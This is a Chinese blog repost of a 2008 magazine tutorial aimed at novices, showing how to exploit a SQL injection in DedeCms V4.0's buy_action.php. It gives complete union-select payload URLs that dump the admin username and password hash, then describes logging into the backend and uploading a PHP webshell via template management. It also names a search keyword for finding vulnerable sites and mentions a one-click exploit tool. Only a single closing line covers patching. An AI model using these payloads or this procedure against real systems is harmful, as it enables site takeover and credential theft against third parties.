最新消息:

教菜鸟来玩DedeCms V4.0注入漏洞

gtocms eben 190浏览 0评论

作者:hackest [H.S.T]

此文章已发表在《黑客X档案》2008年第4期杂志上
后经作者发布在博客上,如转载请务必保留此信息!

DedeCms即织梦内容管理系统,其最新版本已发发行到了5.0,不过这次的漏洞只针对OX V4.0版本有效。漏洞文件为buy_action.php,该文件在对pid的值传递没有做充分的过滤,导致了SQL注入漏洞的产生。去官方网站下载了最新版本的OX V4.0,本地架设环境测试。本文着重介绍漏洞的利用过程,至于漏洞的具体成因将不作详细讨论,有兴趣的朋友可自行阅读漏洞文件代码。可以通过搜索关键字“Power by DedeCms”找到大量使用这套程序的网站。

一、注册用户

本机注册地址为:http://127.0.0.1/dedecms/member/index_do.php?fmdo=user&dopost=regnew,填入相关信息,注册即可,如图1

 

教菜鸟来玩DedeCms V4.0注入漏洞-1

图1

二、爆管理员用户名

注册好了之后就登录系统,提交如下地址即可直接爆管理员的用户名:
http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*
成功爆出了管理员的用户名(hackest),如图2

 

教菜鸟来玩DedeCms V4.0注入漏洞-2

图2

三、爆管理员密码

接下来是直接爆管理员的密码MD5值了,提交如下地址:
http://127.0.0.1/dedecms/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*
成功爆出了管理员的密码MD5值(eee01c9ab7267f25),如图3

 

教菜鸟来玩DedeCms V4.0注入漏洞-3

图3

四、登录后台拿Webshell

怎么样,非常简单吧?到这里就已经可以拿着MD5值直接去查询密码明文了,这里的eee01c9ab7267f25还原成明文即是hackest。下一步就该登录后台拿Webshell了。后台登录地址为(在URL后加上dede即可自动跳转至后台登录页面):
http://127.0.0.1/dedecms/dede/login.php?gotopage=%2Fdedecms%2Fdede%2F
用户名和密码均为hackest,成功登录后台,如图4

 

教菜鸟来玩DedeCms V4.0注入漏洞-4

图4

然后打开“模板管理”页面,直接上传你的PHP马即可,如图5

 

教菜鸟来玩DedeCms V4.0注入漏洞-5

图5

直接在后台点击该文件访问即可跳转至Webshell的登录入口,输入密码进入即可,如图6

教菜鸟来玩DedeCms V4.0注入漏洞-6

图6

整个过程非常的简单,基本上没有什么技术含量可言。如果菜鸟们觉得手动很麻烦的话,不妨试下一个针对此漏洞的利用工具,界面如图7

 

教菜鸟来玩DedeCms V4.0注入漏洞-7

图7

怎么样,很贴心吧,从注册到登录后台的“一条龙”功能!

五、漏洞修补

官方已经给出了补丁,不过没有集成到4.0的安装程序包里面,用补丁包里的buy_action.php文件覆盖原文件即可。

转载请注明:落伍老站长 » 教菜鸟来玩DedeCms V4.0注入漏洞

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址